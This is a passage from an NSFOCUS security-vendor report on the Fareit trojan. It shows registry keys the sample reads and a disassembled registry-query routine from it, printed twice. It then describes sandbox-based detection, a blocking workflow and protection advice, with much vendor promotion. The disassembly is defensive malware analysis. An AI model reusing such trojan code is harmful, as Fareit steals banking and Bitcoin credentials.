11 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HaoZip

12 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IDNMitigationAPIs

13 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

The following shows partial code for registry operations:

1   00401BAA    55              push ebp
2   00401BAB    8BEC            mov ebp,esp
3   00401BAD    83C4 F4         add esp,-0xC
4   00401BB0    57              push edi
5   00401BB1    8B45 14         mov eax,dword ptr ss:[ebp+0x14]
6   00401BB4    23C0            and eax,eax
7   00401BB6    74 06           je short 123.00401BBE
8   00401BB8    C700 00000000   mov dword ptr ds:[eax],0x0
9   00401BBE    2BFF            sub edi,edi
10      00401BC0    837D 18 01      cmp dword ptr ss:[ebp+0x18],0x1
11      00401BC4    75 07           jnz short 123.00401BCD
12      00401BC6    BA 00020000     mov edx,0x200
13      00401BCB    EB 0F           jmp short 123.00401BDC
14      00401BCD    837D 18 02      cmp dword ptr ss:[ebp+0x18],0x2
15      00401BD1    75 07           jnz short 123.00401BDA
16      00401BD3    BA 00010000     mov edx,0x100
17      00401BD8    EB 02           jmp short 123.00401BDC
18      00401BDA    2BD2            sub edx,edx
19      00401BDC    81CA 19000200   or edx,0x20019
20      00401BE2    8D45 FC         lea eax,dword ptr ss:[ebp-0x4]
21      00401BE5    50              push eax
22      00401BE6    52              push edx
23      00401BE7    6A 00           push 0x0
24      00401BE9    FF75 0C         push dword ptr ss:[ebp+0xC]
25      00401BEC    FF75 08         push dword ptr ss:[ebp+0x8]
26      00401BEF    E8 EEF10000     call 123.00410DE2                        ; jmp to ADVAPI32.RegOpenKeyExA
27      00401BF4    0BC0            or eax,eax
28      00401BF6    75 6F           jnz short 123.00401C67
29      00401BF8    8D45 F8         lea eax,dword ptr ss:[ebp-0x8]
30      00401BFB    50              push eax
31      00401BFC    6A 00           push 0x0
32      00401BFE    8D45 F4         lea eax,dword ptr ss:[ebp-0xC]
33      00401C01    50              push eax
34      00401C02    6A 00           push 0x0
35      00401C04    FF75 10         push dword ptr ss:[ebp+0x10]             ; 123.004140A0
36      00401C07    FF75 FC         push dword ptr ss:[ebp-0x4]
37      00401C0A    E8 D9F10000     call 123.00410DE8                        ; jmp to ADVAPI32.RegQueryValueExA
38      00401C0F    23C0            and eax,eax
39      00401C11    75 4C           jnz short 123.00401C5F
40      00401C13    837D F8 00      cmp dword ptr ss:[ebp-0x8],0x0
41      00401C17    74 46           je short 123.00401C5F
42      00401C19    837D F4 01      cmp dword ptr ss:[ebp-0xC],0x1
43      00401C1D    75 06           jnz short 123.00401C25
44      00401C1F    837D F8 01      cmp dword ptr ss:[ebp-0x8],0x1
45      00401C23    74 3A           je short 123.00401C5F
46      00401C25    8B45 F8         mov eax,dword ptr ss:[ebp-0x8]           ; ADVAPI32.77DA6BF3
47      00401C28    40              inc eax
48      00401C29    50              push eax
49      00401C2A    E8 BDFBFFFF     call 123.004017EC
50      00401C2F    8BF8            mov edi,eax
51      00401C31    8D45 F8         lea eax,dword ptr ss:[ebp-0x8]
52      00401C34    50              push eax
53      00401C35    57              push edi
54      00401C36    6A 00           push 0x0
55      00401C38    6A 00           push 0x0
56      00401C3A    FF75 10         push dword ptr ss:[ebp+0x10]             ; 123.004140A0
57      00401C3D    FF75 FC         push dword ptr ss:[ebp-0x4]
58      00401C40    E8 A3F10000     call 123.00410DE8                        ; jmp to ADVAPI32.RegQueryValueExA
59      00401C45    23C0            and eax,eax
60      00401C47    74 0A           je short 123.00401C53
61      00401C49    57              push edi
62      00401C4A    E8 86FBFFFF     call 123.004017D5
63      00401C4F    2BFF            sub edi,edi
64      00401C51    EB 0C           jmp short 123.00401C5F
65      00401C53    8B45 14         mov eax,dword ptr ss:[ebp+0x14]
66      00401C56    23C0            and eax,eax
67      00401C58    74 05           je short 123.00401C5F
68      00401C5A    FF75 F8         push dword ptr ss:[ebp-0x8]              ; ADVAPI32.77DA6BF3
69      00401C5D    8F00            pop dword ptr ds:[eax]                   ; 123.00401BF4
70      00401C5F    FF75 FC         push dword ptr ss:[ebp-0x4]
71      00401C62    E8 87F10000     call 123.00410DEE                        ; jmp to ADVAPI32.RegCloseKey
72      00401C67    8BC7            mov eax,edi
73      00401C69    23C0            and eax,eax
74      00401C6B    75 1C           jnz short 123.00401C89
75      00401C6D    837D 18 02      cmp dword ptr ss:[ebp+0x18],0x2
76      00401C71    73 16           jnb short 123.00401C89
77      00401C73    8B45 18         mov eax,dword ptr ss:[ebp+0x18]
78      00401C76    40              inc eax
79      00401C77    50              push eax
80      00401C78    FF75 14         push dword ptr ss:[ebp+0x14]
81      00401C7B    FF75 10         push dword ptr ss:[ebp+0x10]             ; 123.004140A0
82      00401C7E    FF75 0C         push dword ptr ss:[ebp+0xC]
83      00401C81    FF75 08         push dword ptr ss:[ebp+0x8]
84      00401C84    E8 21FFFFFF     call 123.00401BAA
85      00401C89    5F              pop edi                                  ; 123.00401BF4
86      00401C8A    C9              leave
87      00401C8B    C2 1400         retn 0x14

1 00401BAA 55 push ebp

2 00401BAB 8BEC mov ebp,esp

3 00401BAD 83C4 F4 add esp,-0xC

4 00401BB0 57 push edi

5 00401BB1 8B45 14 mov eax,dword ptr ss:[ebp+0x14]

6 00401BB4 23C0 and eax,eax

7 00401BB6 74 06 je short 123.00401BBE

8 00401BB8 C700 00000000 mov dword ptr ds:[eax],0x0

9 00401BBE 2BFF sub edi,edi

10 00401BC0 837D 18 01 cmp dword ptr ss:[ebp+0x18],0x1

11 00401BC4 75 07 jnz short 123.00401BCD

12 00401BC6 BA 00020000 mov edx,0x200

13 00401BCB EB 0F jmp short 123.00401BDC

14 00401BCD 837D 18 02 cmp dword ptr ss:[ebp+0x18],0x2

15 00401BD1 75 07 jnz short 123.00401BDA

16 00401BD3 BA 00010000 mov edx,0x100

17 00401BD8 EB 02 jmp short 123.00401BDC

18 00401BDA 2BD2 sub edx,edx

19 00401BDC 81CA 19000200 or edx,0x20019

20 00401BE2 8D45 FC lea eax,dword ptr ss:[ebp-0x4]

21 00401BE5 50 push eax

22 00401BE6 52 push edx

23 00401BE7 6A 00 push 0x0

24 00401BE9 FF75 0C push dword ptr ss:[ebp+0xC]

25 00401BEC FF75 08 push dword ptr ss:[ebp+0x8]

26 00401BEF E8 EEF10000 call 123.00410DE2 ; jmp to ADVAPI32.RegOpenKeyExA

27 00401BF4 0BC0 or eax,eax

28 00401BF6 75 6F jnz short 123.00401C67

29 00401BF8 8D45 F8 lea eax,dword ptr ss:[ebp-0x8]

30 00401BFB 50 push eax

31 00401BFC 6A 00 push 0x0

32 00401BFE 8D45 F4 lea eax,dword ptr ss:[ebp-0xC]

33 00401C01 50 push eax

34 00401C02 6A 00 push 0x0

35 00401C04 FF75 10 push dword ptr ss:[ebp+0x10] ; 123.004140A0

36 00401C07 FF75 FC push dword ptr ss:[ebp-0x4]

37 00401C0A E8 D9F10000 call 123.00410DE8 ; jmp to ADVAPI32.RegQueryValueExA

38 00401C0F 23C0 and eax,eax

39 00401C11 75 4C jnz short 123.00401C5F

40 00401C13 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0

41 00401C17 74 46 je short 123.00401C5F

42 00401C19 837D F4 01 cmp dword ptr ss:[ebp-0xC],0x1

43 00401C1D 75 06 jnz short 123.00401C25

44 00401C1F 837D F8 01 cmp dword ptr ss:[ebp-0x8],0x1

45 00401C23 74 3A je short 123.00401C5F

46 00401C25 8B45 F8 mov eax,dword ptr ss:[ebp-0x8] ; ADVAPI32.77DA6BF3

47 00401C28 40 inc eax

48 00401C29 50 push eax

49 00401C2A E8 BDFBFFFF call 123.004017EC

50 00401C2F 8BF8 mov edi,eax

51 00401C31 8D45 F8 lea eax,dword ptr ss:[ebp-0x8]

52 00401C34 50 push eax

53 00401C35 57 push edi

54 00401C36 6A 00 push 0x0

55 00401C38 6A 00 push 0x0

56 00401C3A FF75 10 push dword ptr ss:[ebp+0x10] ; 123.004140A0

57 00401C3D FF75 FC push dword ptr ss:[ebp-0x4]

58 00401C40 E8 A3F10000 call 123.00410DE8 ; jmp to ADVAPI32.RegQueryValueExA

59 00401C45 23C0 and eax,eax

60 00401C47 74 0A je short 123.00401C53

61 00401C49 57 push edi

62 00401C4A E8 86FBFFFF call 123.004017D5

63 00401C4F 2BFF sub edi,edi

64 00401C51 EB 0C jmp short 123.00401C5F

65 00401C53 8B45 14 mov eax,dword ptr ss:[ebp+0x14]

66 00401C56 23C0 and eax,eax

67 00401C58 74 05 je short 123.00401C5F

68 00401C5A FF75 F8 push dword ptr ss:[ebp-0x8] ; ADVAPI32.77DA6BF3

69 00401C5D 8F00 pop dword ptr ds:[eax] ; 123.00401BF4

70 00401C5F FF75 FC push dword ptr ss:[ebp-0x4]

71 00401C62 E8 87F10000 call 123.00410DEE ; jmp to ADVAPI32.RegCloseKey

72 00401C67 8BC7 mov eax,edi

73 00401C69 23C0 and eax,eax

74 00401C6B 75 1C jnz short 123.00401C89

75 00401C6D 837D 18 02 cmp dword ptr ss:[ebp+0x18],0x2

76 00401C71 73 16 jnb short 123.00401C89

77 00401C73 8B45 18 mov eax,dword ptr ss:[ebp+0x18]

78 00401C76 40 inc eax

79 00401C77 50 push eax

80 00401C78 FF75 14 push dword ptr ss:[ebp+0x14]

81 00401C7B FF75 10 push dword ptr ss:[ebp+0x10] ; 123.004140A0

82 00401C7E FF75 0C push dword ptr ss:[ebp+0xC]

83 00401C81 FF75 08 push dword ptr ss:[ebp+0x8]

84 00401C84 E8 21FFFFFF call 123.00401BAA

85 00401C89 5F pop edi ; 123.00401BF4

86 00401C8A C9 leave

87 00401C8B C2 1400 retn 0x14

Detection and Prevention

Malware is often sent to the target host as an email attachment. Therefore, users should be cautious when opening emails from unknown sources. As a proprietary product of NSFOCUS, NSFOCUS TAC can effectively detect unknown attacks, preventing unpredictable loss caused by malware for users.

Virtual Execution Detection Technique of NSFOCUS TAC

On November 5, after NSFOCUS TAC intercepted the Fareit trojan sample, it was found that only 6 of 55 pieces of antivirus software could analyze it for virus. Since this was unknown malware, it was not uniformly named. The core virtual execution technique contributes to TAC’s quick detection of unknown threats.

Detection principles:

 NSFOCUS TAC executes the entire or partial sample in the virtual environment and records the execution behaviors, based on which NSFOCUS TAC determines whether the sample is malicious.
 Traditional signature-based devices detect malware by matching patterns. That is, they extract certain binary character sequences to identify the sample. This matching mode can only detect known malicious samples and can be easily bypassed by software protection tools. It is totally helpless in the face of new malicious samples, and therefore the signature base needs to be continuously updated to cope with emerging malicious samples.
 Virtual execution is based on the detection of attack behaviors, whose types change very slowly. No matter how new samples change or are protected, they will finally perform malicious behaviors (such as executing shellcode or launching C&C attacks) after execution. Generally, these behaviors cannot be hidden.
Types of virtual execution

According to the virtual environment, virtual execution falls into lightweight virtual execution and system-level virtual execution.
Lightweight virtual execution is to execute the code fragments and determine whether the sample is malicious according to the logical behaviors of the code sequence.
System-level virtual execution simulates the real environment to the greatest extent, including the entire operating system and application environment, and then judges the execution behaviors of the virus sample.

• Currently, system-level virtual execution is subdivided into API monitoring-based virtual execution and dynamic translation-based virtual execution. The API monitoring-based virtual execution can only detect API behaviors and is often used by traditional sandboxes. • Dynamic translation-based virtual execution can detect the code and identify more malicious behaviors and virtual execution evasion behaviors. Currently, NSFOCUS TAC adopts this technique.
Virtual execution evasion technique

 Currently, evasion techniques against virtual execution emerge. These evasion techniques can be used to bypass the detection of certain virtual execution engines.
 However, NSFOCUS has the detection technique to detect the malicious samples which can bypass virtual execution.

NGTP Network Protection Technique

Based on the advanced virtual execution technique, NSFOCUS Next-Generation Threat Protection Solution (NGTP) can effectively detect and prevent Fareit trojan attacks. NSFOCUS NGTP consists of NSFOCUS TAC (the local sandbox), NSFOCUS Network Intrusion Prevention System (NIPS), NSFOCUS security reputation, and NSFOCUS Enterprise Security Planning Customer (ESPC). The procedure for NGTP to prevent trojan and even 0-day vulnerabilities is as follows:

Step 1 Use TAC to detect viruses: TAC performs static analysis of shellcode with its static check engine and then virtual execution with its Shellcode static analysis. In this way, Fareit trojan is detected.
Step 2 After TAC detecting the source of the malware, TAC generates the reputation information, including the file reputation and source IP address of the attack. The reputation information will be synchronized to the local ESPC, forming a local reputation library.
Step 3 After receiving the reputation information of the malware from the local reputation library, NIPS blocks the source IP address and generates an alert log.

NGTP’s attack prevention flowchart

Kingsoft’s Suggestions for Terminal Protection

Fareit trojan is mainly exploited to send spam to steal online bank information and Bitcoin account information. As suggested by Kingsoft security experts, to prevent such trojan virus, do not open email attachments from strangers, update system patches and browsers timely, and use Kingsoft AntiVirus (for individuals) or V8+ (for enterprises) to protect the computer system and individual information.

Overall Solution of NGTP

NGTP can cope with trojans and even 0-day vulnerability attacks with ease. Focusing on the APT attack chain, it can effectively detect and prevent APT attacks in three major stages, that is, reconnaissance, lure, and data theft.

Characterized by globally distributed threat detection clouds and focusing on detection of unknown threats, NGTP collaborates with traditional terminal and gateway devices for the sharing of threat intelligence across vendors and visualization of threat trends to achieve the aim of improving enterprises’ capability of preventing APTs.

NGTP

Threat Intelligence

The obtaining of and responding to threat-related intelligence, to some extent, reflect a security vendor’s protection capacity. The threat intelligence service system consists of at least threat monitoring and responding, data analysis and sorting, business intelligence and delivery, risk assessment and consultancy, and security hosting and application, involving the research, products, services, operations, and marketing. NSFOCUS, through an all-round emergency response system covering the research, cloud, products, and services, promptly provides threat intelligence and follow-up services regarding Anonymous attacks for enterprises and organizations, ensuring their business continuity.
For any questions or more information, please contact us by searching Sina Weibo or WeChat for NSFOCUS.

About NSFOCUS

nsfocus

NSFOCUS Information Technology Co., Ltd. (NSFOCUS) was founded in April 2000, headquartered in Beijing. With more than 30 branches and subsidiaries at home and abroad, the company provides most competitive security products and solutions for governments, carriers, and financial, energy, Internet, education, and medical sectors, ensuring customers’ business continuity.
Based on years of research in security assurance, NSFOCUS has set foot in network and terminal security, Internet infrastructure security, and compliance and security management. The company provides the intrusion detection/prevention system, anti-DDoS system, remote security assessment system, and web security protection products as well as professional security services for customers.
NSFOCUS Information Technology Co., Ltd. started trading its shares at China’s Nasdaq-style market, ChiNext, in Shenzhen on January 29, 2014, with the name of NSFOCUS and code of 300369.